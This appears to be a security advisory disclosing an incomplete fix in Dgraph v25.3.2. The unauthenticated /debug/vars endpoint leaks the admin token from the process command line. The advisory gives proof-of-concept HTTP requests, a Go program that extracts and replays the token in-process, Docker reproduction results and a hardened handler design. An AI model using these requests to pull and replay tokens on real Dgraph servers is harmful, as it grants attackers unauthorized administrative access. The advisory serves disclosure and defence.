Dgraph v25.3.2 still exposes the process command line through the unauthenticated /debug/vars endpoint on Alpha. Because the admin token is commonly supplied via the --security "token=..." startup flag, an unauthenticated attacker can retrieve that token and replay it in the X-Dgraph-AuthToken header to access admin-only endpoints.
This is a variant of the previously fixed /debug/pprof/cmdline issue, but the current fix is incomplete because it blocks only /debug/pprof/cmdline and still serves http.DefaultServeMux, which includes expvar's /debug/vars handler.
Alpha still exposes Go's default HTTP mux:

x/metrics.go
- expvarConf = expvar.NewMap("dgraph_config")
- importing the expvar package automatically registers /debug/vars on http.DefaultServeMux
- expvar publishes cmdline = os.Args and memstats = runtime.MemStats

Alpha's HTTP handler explicitly blocks only the old CVE path:

dgraph/cmd/alpha/run.go
- if r.URL.Path == "/debug/pprof/cmdline", the handler returns 404
- every other request falls through to http.DefaultServeMux.ServeHTTP(w, r)

Admin endpoints still trust the leaked token:

dgraph/cmd/alpha/admin.go
- the X-Dgraph-AuthToken request header is compared against worker.Config.AuthToken, which holds the value supplied by the --security token=... flag
1. Request the expvar endpoint without any credentials:

GET /debug/vars HTTP/1.1
Host: target:8080

2. Parse the JSON response and read the cmdline field, which is the Alpha process's argv.

3. Extract the admin token from the startup arguments, for example:

--security token=debug-vars-secret;

4. Replay the token against an admin-only endpoint:

GET /admin/config/cache_mb HTTP/1.1
Host: target:8080
X-Dgraph-AuthToken: debug-vars-secret
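The two handler shapes described in the details section (the incomplete fix that blocks one path and then falls through to http.DefaultServeMux, beside a hardened variant that never reaches that mux) together with the two PoC requests above, run in-process against each handler. This is an added example in Go and is not Dgraph's own code: adminCacheMB, the example_config expvar map, the 4096 response body and the debug-vars-secret token are constructed stand-ins, and the token extraction also accepts the --security=token=... spelling, which the PoC does not show.

```go
package main

import (
	"crypto/subtle"
	"encoding/json"
	"expvar"
	"fmt"
	"net/http"
	"net/http/httptest"
	"os"
	"strings"
)

// Importing expvar registers /debug/vars on http.DefaultServeMux and publishes
// "cmdline" (os.Args, read at request time); "example_config" stands in for dgraph_config.
var _ = expvar.NewMap("example_config")
const adminToken = "debug-vars-secret" // constructed; same value as the PoC above

// Stand-in for an admin-only endpoint; the 4096 response body is constructed.
func adminCacheMB(w http.ResponseWriter, r *http.Request) {
	if subtle.ConstantTimeCompare([]byte(r.Header.Get("X-Dgraph-AuthToken")), []byte(adminToken)) != 1 {
		http.Error(w, "Invalid X-Dgraph-AuthToken", http.StatusUnauthorized)
		return
	}
	fmt.Fprintln(w, 4096)
}

func init() { http.HandleFunc("/admin/config/cache_mb", adminCacheMB) } // lands on DefaultServeMux

// vulnerableHandler mirrors the incomplete fix: only /debug/pprof/cmdline is
// blocked; everything else falls through to DefaultServeMux, where expvar lives.
func vulnerableHandler() http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.URL.Path == "/debug/pprof/cmdline" {
			http.NotFound(w, r)
			return
		}
		http.DefaultServeMux.ServeHTTP(w, r)
	})
}

// hardenedHandler serves only routes it registered itself on a private mux and
// never delegates to DefaultServeMux, so anything an imported package registered
// there (expvar, net/http/pprof, ...) is unreachable from this listener.
func hardenedHandler() http.Handler {
	mux := http.NewServeMux()
	mux.HandleFunc("/admin/config/cache_mb", adminCacheMB)
	return mux
}

// extractToken pulls the admin token out of a /debug/vars body, handling both the
// "--security token=...;..." and "--security=token=...;..." argument forms.
func extractToken(body []byte) (string, bool) {
	var vars struct{ Cmdline []string `json:"cmdline"` }
	if err := json.Unmarshal(body, &vars); err != nil {
		return "", false
	}
	for i, a := range vars.Cmdline {
		opts := strings.TrimPrefix(a, "--security=")
		if a == "--security" && i+1 < len(vars.Cmdline) {
			opts = vars.Cmdline[i+1]
		} else if opts == a {
			continue // neither form of the --security flag
		}
		for _, kv := range strings.Split(opts, ";") {
			if kv = strings.TrimSpace(kv); strings.HasPrefix(kv, "token=") && kv != "token=" {
				return strings.TrimPrefix(kv, "token="), true
			}
		}
	}
	return "", false
}

// fetchLeakedToken is the PoC's first request, run in-process against h.
func fetchLeakedToken(h http.Handler) (string, bool) {
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, httptest.NewRequest(http.MethodGet, "/debug/vars", nil))
	if rec.Code != http.StatusOK {
		return "", false
	}
	return extractToken(rec.Body.Bytes())
}

// replay is the PoC's second request; it returns the HTTP status code.
func replay(h http.Handler, token string) int {
	req := httptest.NewRequest(http.MethodGet, "/admin/config/cache_mb", nil)
	req.Header.Set("X-Dgraph-AuthToken", token)
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	os.Args = append(os.Args, "--security", "token="+adminToken+";") // simulate the Alpha flag
	for _, h := range []http.Handler{vulnerableHandler(), hardenedHandler()} {
		tok, leaked := fetchLeakedToken(h)
		fmt.Printf("leaked=%v token=%q replay=HTTP %d\n", leaked, tok, replay(h, tok))
	}
}
```

Run with go run: the vulnerable handler reports leaked=true and HTTP 200 on replay, the hardened one leaked=false and HTTP 401. The fix is not a longer path blocklist but never routing a public listener through http.DefaultServeMux, since any imported package can register handlers on it silently; if debug endpoints are needed, serve them from a separate listener that is not reachable by untrusted clients.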
This was reproduced against dgraph/dgraph:v25.3.2 in Docker.

Observed behavior:
- /debug/vars leaked the configured token
- the request to /admin/config/cache_mb with the leaked X-Dgraph-AuthToken succeeded and returned 4096

It was verified that the old CVE path is specifically patched in the same version:
- /debug/pprof/cmdline returned 404 Not Found
- /debug/pprof/ remained reachable, confirming that the fix is a single-path block rather than removal of the debug mux

Unauthenticated attackers can obtain the Alpha admin token and gain unauthorized administrative access.

This enables privileged admin operations on every endpoint that is protected only by the X-Dgraph-AuthToken check.

In deployments where the Alpha HTTP port is reachable by untrusted parties, this is a practical authentication bypass to admin functionality.
{
"github_reviewed_at": "2026-04-24T16:15:28Z",
"nvd_published_at": "2026-04-24T19:17:14Z",
"github_reviewed": true,
"cwe_ids": [
"CWE-200"
],
"severity": "CRITICAL"
}